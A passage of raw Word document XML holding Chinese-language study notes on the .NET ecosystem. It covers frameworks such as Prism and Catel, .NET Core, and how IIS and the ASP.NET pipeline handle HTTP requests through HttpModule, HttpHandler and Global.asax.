          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET Web form</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>System.UI.Page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ViewState</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Winform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVVM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在.Net中(主要应用于WPF、Silverlight、WP7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Prism - Brian Lagunas微软产品经理，微软MVP,一个跨平台的桌面和移动MVVM开发框架，开源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Catel - Catel是一个专注于MVVM（WPF，Silverlight，Windows Phone和WinRT）和MVC（ASP.NET MVC）的应用程序开发平台。 Catel的核心包含一个IoC容器，模型，验证，纪念，消息中介，参数检查等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在前端中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Angular</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Vue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Knockout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="13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平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MONO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.Net Core</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CoreCLR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CoreRT for .NET Core</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.NET Core Base Class Library</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.Net Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.NET Framework Base Class Library(BCL基类库)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
        <w:rPr>
          <w:color w:val="3F51B5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="3F51B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>System.Web（ASP.NET的核心）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET与IIS管道模型：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Http处理流程概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>请求到服务器端的处理流程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>用户在浏览器中输入的地址，通过DNS解析成“协议+IP+端口“，类似地址，浏览器就将请求发送到这个地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>有IP确定服务器，请求到达这个地址（服务器）后，再由端口确定进程，由服务器对应的进程处理，在windows server服务器是由一个名为HTTP.SYS服务来接受http请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP.SYS服务接受到请求后，HTTP.SYS和IIS属于两个进程，属于两个进程之间的通讯，HTTP.SYS通过pipeline（管线）方式转发给IIS。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>IIS识别不同类型的请求，然后交给不同的应用程序处理，若找不到此类型的处理程序，且请求的文件没有收到服务器保护，则IIS直接把请求的文件返回给客户端。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:spacing w:val="1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w: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p>
      <w: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pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP.NET</w:t>
      </w:r>
      <w:r>
        <w:t>管道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>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pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>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6364082606634756423503037.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4905375" cy="3552825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>HttpRuntime将请求转交给HttpApplication（表示Web应用程序），HttpApplication创建针对Http请求的HttpContext对象，这些对象包含如HttpRequest、HttpResponse等对象， 这些对象在程序中可以通过上下文类进行访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>接下来Http请求会通过一系列的HttpModule，这些Module对Http请求具有完全控制权，可以做一些执行某个实际工作前的事情。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>接来下会被HttpHandler处理，如webForm中的aspx页面继承的page类就是实现了IHttpHandler接口，mvc中则是交给MvcHandler处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>HttpHandler处理完成后，Http请求会再次回到Module，此时Module则可以做一些某个实际工作完成后的事情。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:spacing w:val="1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>请求在管道中要经过一系列的事件，这些事件由HttpApplication引发，通常由HttpModule订阅，也可以在全局类Global.asax中订阅，这一系列的事件就是一次请求的生命周期。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
      </w:pPr>
      <w:r>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6364126633124959076796356.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3905885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HttpModule内部事件机制和生命周期：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
      </w:pPr>
      <w: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6364126633853572074804770.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3782695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附上中文详细解释图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
      </w:pPr>
      <w:r>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HttpModuleHandler.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="5274310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET全局文件GLOBAL.ASAX用法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>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文件继承自HttpApplication 类，它维护一个HttpApplication 对象池，并在需要时将对象池中的对象分配给应用程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>包含的事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
